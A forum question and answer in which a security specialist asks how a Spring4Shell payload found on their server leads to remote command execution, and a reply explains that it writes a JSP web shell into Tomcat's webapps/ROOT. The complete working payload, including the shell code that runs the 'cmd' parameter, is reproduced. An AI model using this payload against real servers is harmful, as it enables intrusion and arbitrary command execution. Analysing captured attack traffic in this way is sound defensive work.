Understanding the Spring4shell payload
I have noticed this payload on my webserver after decoding it on wireshark yet very confused on how it leads to remote command execution , considering I am security speicalist not a programmer , can someone explain to me this code.
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{prefix}i java.io.InputStream in = %{c}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=


This blog post goes into some detail.
In short, older versions of Spring had some logging functionality which was capable of writing arbitary text to a file on the server. The payload exploits this, creating a JSP (Java Server Pages) file in webapps/ROOT - which certain versions of Tomcat will happily serve to the public, via yourwebsite.com/shell.jsp.
That's bad enough by itself, as the attacker is now displaying arbitary content through your application - but they then take further advantage of this, via JSP's ability to contain embedded Java code.
When they, for example, load up yourwebsite.com/shell.jsp?cmd=dangerouscommand, the Java they have embedded in the JSP file will execute dangerouscommand on the server, and return its output as part of the rendered page. That's a textbook example of remote command execution!
